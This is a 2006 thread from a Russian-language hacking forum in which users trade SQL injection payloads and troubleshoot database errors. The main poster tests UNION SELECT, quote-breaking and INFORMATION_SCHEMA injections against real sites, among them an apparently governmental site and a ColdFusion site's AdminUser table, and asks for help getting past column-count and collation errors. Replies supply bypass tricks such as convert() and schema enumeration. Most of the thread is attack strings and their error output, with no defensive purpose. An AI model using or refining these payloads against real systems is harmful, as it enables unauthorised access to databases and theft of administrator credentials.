ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу [ sql inj need help ]
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[ sql inj need help ]
  #1  
Старый 12.08.2006, 00:50
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


Question [ sql inj need help ]
сабж.
постить токо по теме нужен пример запроса к базе...

test.php?id=-1+union+select+1,2,3,4,USER(),6,7,8,9/*

Цитата:
Query failed: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
 
Ответить с цитированием

  #2  
Старый 12.08.2006, 01:09
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
http://zaco.cup.su/?file=view&news_id=15

юзай моск, поиск и convert()
 
Ответить с цитированием

  #3  
Старый 12.08.2006, 10:44
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию
только тут придется использовать convert(user() using latin1) cp1251 просто чаще встречается
 
Ответить с цитированием

  #4  
Старый 12.08.2006, 16:39
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
ZaCo стукни пожалуста 170501.
Раньше занимался исключительно mysql к mssql привыкаю еще не все знаю.
Хотелось бы поговорить...

вот еще

index.cfm?topicID=17%20UNION%20SELECT%20TOP%201%20 user%20FROM%20AdminUser--

Цитата:
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
index.cfm?topicID=17%20UNION%20SELECT%20TOP%201%20 random%20FROM%20AdminUser--

Цитата:
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Invalid column name 'random'.
Собственно еще вопрос елси верно нет вывода данных?
 
Ответить с цитированием

  #5  
Старый 12.08.2006, 21:56
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию
Invalid column name

попробуй

INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=
 
Ответить с цитированием

  #6  
Старый 12.08.2006, 23:56
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
2limpompo
ты не посмотрел это прмер все таблицы и поля известны перечитай вопрос почему не выводит если все правильно?
 
Ответить с цитированием

  #7  
Старый 13.08.2006, 20:46
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


Exclamation
Вот наткнулся на сайтик не как не могу понять что делаю не так sql точно есть но вот составить не как не могу вот краткий список моих действий.

_http://site.gov/index.asp?cat=6" or 1=1--
_http://site.gov/index.asp?cat=6' or 1=1--
Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' or 1=1--'.

/browsebycategory.asp, line 15
Исполняетьбся ез ошибок Принимает значение "6".
_http://site.gov/index.asp?cat=6 or 1=1--

Такой запрос не сьедает. Ругаеться на кол - во строк.
_http://site.gov/index.asp?cat=6 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/browsebycategory.asp, line 65

Попытка прервать запрос не удаеться.
как с одинарной так и с 2 кавычкой.
_http://site.gov/index.asp?cat=6'; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--'.

/browsebycategory.asp, line 15

Ну собственно хотелось бы узнать как составить запрос на выполнение кто может помогите.

Особенно интересует эта ошибка как ее обойти.
Понятно что количество строк не совпадает...

Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/browsebycategory.asp, line 65
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ